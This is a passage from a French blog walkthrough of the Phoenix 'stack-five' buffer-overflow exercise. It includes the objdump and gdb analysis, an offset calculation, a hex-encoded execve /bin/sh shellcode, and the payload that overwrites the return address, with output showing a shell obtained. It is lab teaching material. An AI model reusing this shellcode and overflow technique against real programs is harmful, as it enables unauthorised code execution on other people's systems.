<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">BANNER</span><span class="p">);</span>
  <span class="n">start_level</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>Alors, ici, on doit toujours réécrire l’adresse de retour enregistrée dans la pile. En revanche, on doit rediriger l’exécution vers du code qu’on charge dans le buffer.</li>
  <li>Pour cela, on doit connaitre l’adresse exacte où est situé notre buffer en passant par <strong>gdb</strong>. Mais avant, on peut préparer le terrain en utilisant <code class="language-plaintext highlighter-rouge">objdump</code>.</li>
</ul>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@phoenix-amd64:~<span class="nv">$ </span>objdump <span class="nt">--disassemble</span> /opt/phoenix/amd64/stack-five 
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>000000000040058d &lt;start_level&gt;:
  40058d:	55                   	push   %rbp
  40058e:	48 89 e5             	mov    %rsp,%rbp
  400591:	48 83 c4 80          	add    $0xffffffffffffff80,%rsp
  400595:	48 8d 45 80          	lea    -0x80(%rbp),%rax
  400599:	48 89 c7             	mov    %rax,%rdi
  40059c:	e8 4f fe ff ff       	callq  4003f0 &lt;gets@plt&gt;
  4005a1:	90                   	nop
  4005a2:	c9                   	leaveq 
  4005a3:	c3                   	retq   
</code></pre></div></div>
<ul>
  <li>Alors, l’instruction <code class="language-plaintext highlighter-rouge">add    $0xffffffffffffff80,%rsp</code> est équivalente à <code class="language-plaintext highlighter-rouge">sub $0x80, %rsp</code>, autrement dit, on alloue 128 octets (la taille du buffer). Et l’appel à <code class="language-plaintext highlighter-rouge">gets()</code> nous confirme que le buffer commence bel et bien à <code class="language-plaintext highlighter-rouge">%rsp == %rbp - 0x80</code>. Avec cela, on peut calculer le nombre d’octets nécessaires pour arriver à l’adresse de retour.
    <ul>
      <li>128 octets + 8 octets du rbp sauvegardé = 136 octets avant l’adresse de retour.</li>
    </ul>
  </li>
</ul>

<blockquote>
  <p>Vous pouvez aussi inspecter la mémoire quand gdb est dans <code class="language-plaintext highlighter-rouge">start_level</code> pour voir où se trouve l’adresse de l’instruction juste après <code class="language-plaintext highlighter-rouge">call start_level</code> dans <code class="language-plaintext highlighter-rouge">main()</code> et calculer la différence entre elle et l’adresse du buffer.</p>
</blockquote>

<ul>
  <li>Le gdb de la VM n’aime pas avoir du python comme entrée, du coup je crée une variable d’environnement qui stockera un shellcode de <strong>57 octets</strong> et <strong>79 ‘E’</strong>, vu que l’adresse du buffer contiendra des zéros, on la passera directement via un <code class="language-plaintext highlighter-rouge">echo -ne</code> ou un <code class="language-plaintext highlighter-rouge">printf</code>.</li>
</ul>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">fill</span><span class="o">=</span><span class="si">$(</span><span class="nb">printf</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">48</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">5f</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">0f</span><span class="se">\x</span><span class="s2">05</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">48</span><span class="se">\x</span><span class="s2">bf</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">76</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">79</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">5f</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">5e</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">be</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">27</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">0f</span><span class="se">\x</span><span class="s2">05</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">48</span><span class="se">\x</span><span class="s2">bf</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">62</span><span class="se">\x</span><span class="s2">69</span><span class="se">\x</span><span class="s2">6e</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">5f</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">5e</span><span class="se">\x</span><span class="s2">48</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">3b</span><span class="se">\x</span><span class="s2">0f</span><span class="se">\x</span><span class="s2">05"</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s1">'print("E"*79)'</span><span class="si">))</span>
</code></pre></div></div>

<ul>
  <li>Les variables d’environnement sont chargées en mémoire au-dessus de la pile, une modification de ces dernières décalera le début de la pile, et changera l’adresse où commence le buffer.</li>
  <li>En lançant <strong>gdb</strong> faites toujours en sorte d’exécuter ses instructions avant <code class="language-plaintext highlighter-rouge">run</code> ou <code class="language-plaintext highlighter-rouge">start</code>, pour avoir le même début de pile que si on exécute le code via le terminal:</li>
</ul>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    user@phoenix-amd64:~<span class="nv">$ </span>gdb /opt/phoenix/amd64/stack-five
    <span class="o">(</span>gdb<span class="o">)</span> <span class="nb">unset env </span>LINES
    <span class="o">(</span>gdb<span class="o">)</span> <span class="nb">unset env </span>COLUMNS
    <span class="o">(</span>gdb<span class="o">)</span> <span class="nb">set env </span><span class="nv">_</span><span class="o">=</span>/opt/phoenix/amd64/stack-five
    <span class="o">(</span>gdb<span class="o">)</span> b <span class="k">*</span>start_level+20 <span class="c"># c'est l'adresse de l'instruction nop dans start_level (4005a1)</span>
    <span class="o">(</span>gdb<span class="o">)</span> run &lt; &lt;<span class="o">(</span><span class="nb">printf</span> <span class="nv">$fill</span><span class="s2">"</span><span class="se">\x</span><span class="s2">FF</span><span class="se">\x</span><span class="s2">FF</span><span class="se">\x</span><span class="s2">FF</span><span class="se">\x</span><span class="s2">FF</span><span class="se">\x</span><span class="s2">FF</span><span class="se">\x</span><span class="s2">FF</span><span class="se">\x</span><span class="s2">FF</span><span class="se">\x</span><span class="s2">FF"</span><span class="o">)</span> <span class="c"># juste pour tester</span>
</code></pre></div></div>

<ul>
  <li>
    <p>Et là, on retient l’adresse de <code class="language-plaintext highlighter-rouge">%rsp</code>:<code class="language-plaintext highlighter-rouge">0x00007fffffffe450</code> (elle est sûrement différente chez vous !!). On peut faire deux <code class="language-plaintext highlighter-rouge">stepi</code> pour arriver à <code class="language-plaintext highlighter-rouge">ret</code>, là on remarque que la valeur pointée par <code class="language-plaintext highlighter-rouge">%rsp</code>=<code class="language-plaintext highlighter-rouge">0xffffffffffffffff</code>, et que gdb affiche <code class="language-plaintext highlighter-rouge">Cannot disassemble from $PC</code> vu que l’adresse de retour pointe vers de l’espace kernel.</p>
  </li>
  <li>
    <p>En relançant gdb en écrivant la bonne adresse du buffer à la place de l’adresse de retour, on obtient:</p>
  </li>
</ul>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>gdb<span class="o">)</span> <span class="nb">unset env </span>LINES
<span class="o">(</span>gdb<span class="o">)</span> <span class="nb">unset env </span>COLUMNS
<span class="o">(</span>gdb<span class="o">)</span> <span class="nb">set env </span><span class="nv">_</span><span class="o">=</span>/opt/phoenix/amd64/stack-five
<span class="o">(</span>gdb<span class="o">)</span> run &lt; &lt;<span class="o">(</span><span class="nb">printf</span> <span class="nv">$fill</span><span class="s2">"</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">e4</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">00</span><span class="se">\x</span><span class="s2">00"</span><span class="o">)</span>

Starting program: /opt/phoenix/amd64/stack-five &lt; &lt;<span class="o">(</span><span class="nb">printf</span> <span class="nv">$fill</span><span class="s2">"</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">e4</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">00</span><span class="se">\x</span><span class="s2">00"</span><span class="o">)</span>
Welcome to phoenix/stack-five, brought to you by https://exploit.education
process 428 is executing new program: /bin/dash
warning: Could not load shared library symbols <span class="k">for </span>linux-vdso.so.1.
Do you need <span class="s2">"set solib-search-path"</span> or <span class="s2">"set sysroot"</span>?

<span class="nv">$ </span><span class="c"># shell started</span>
</code></pre></div></div>

<ul>
  <li>Quand vous lancerez le programme depuis le terminal, utilisez le chemin absolu pour avoir la même valeur pour la variable <code class="language-plaintext highlighter-rouge">_</code> que ce qu’on a mis sur gdb.</li>
</ul>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@phoenix-amd64:~<span class="nv">$ </span><span class="nb">echo</span> <span class="nt">-ne</span> <span class="s2">"</span><span class="nv">$fill</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">e4</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">00</span><span class="se">\x</span><span class="s2">00"</span> | /opt/phoenix/amd64/stack-five 
<span class="nv">$ </span><span class="c"># shell started</span>
</code></pre></div></div>

<blockquote>
  <p>Si vous ca ne marche pas avec <code class="language-plaintext highlighter-rouge">start</code> alors que le shellcode est bel et bien exécuté, essayez avec <code class="language-plaintext highlighter-rouge">run</code> et en utilisant un fichier au lieu d’une commande bash:</p>
  <div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@phoenix-amd64:~<span class="nv">$ </span><span class="nb">echo</span> <span class="nt">-ne</span> <span class="s2">"</span><span class="nv">$fill</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">e4</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">00</span><span class="se">\x</span><span class="s2">00"</span> <span class="o">&gt;</span> input-stack-five.txt
user@phoenix-amd64:~<span class="nv">$ </span>gdb /opt/phoenix/amd64/stack-five
<span class="o">(</span>gdb<span class="o">)</span> <span class="nb">unset env </span>LINES
<span class="o">(</span>gdb<span class="o">)</span> <span class="nb">unset env </span>COLUMNS
<span class="o">(</span>gdb<span class="o">)</span> <span class="nb">set env </span><span class="nv">_</span><span class="o">=</span>/opt/phoenix/amd64/stack-five
<span class="o">(</span>gdb<span class="o">)</span> start &lt; ./input-stack-five.txt
</code></pre></div>  </div>
</blockquote>

        </div>
    </div><a class="u-url" href="/2024/01/23/phoenix.html" hidden></a>
</article>
      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="https://s-mazigh.github.io/ASMx86_64/%20/"></data>

  <div class="wrapper">

    <div class="footer-col-wrapper">
      <div class="footer-col">
        <!-- <p class="feed-subscribe">
          <a href="https://s-mazigh.github.io/ASMx86_64/feed.xml">
            <svg class="svg-icon orange">
              <use xlink:href="/assets/minima-social-icons.svg#rss"></use>
            </svg><span>Subscribe</span>
          </a>
        </p> -->
        <ul class="contact-list">
          <li class="p-name">S-Mazigh</li>
          <li><a class="u-email" href="mailto:mazigh.o.saoudi@gmail.com">mazigh.o.saoudi@gmail.com</a></li>
        </ul>
      </div>
      <div class="footer-col">
        <p>Quelques notes à propos de l&#39;architecture x86_64 sous l&#39;ABI amd64 linux. Notez que les instructions des exemples suivent la syntaxe AT&amp;T.</p>
      </div>
    </div>

    <div class="social-links"><ul class="social-media-list"></ul>
</div>

  </div>

</footer></body>

</html>
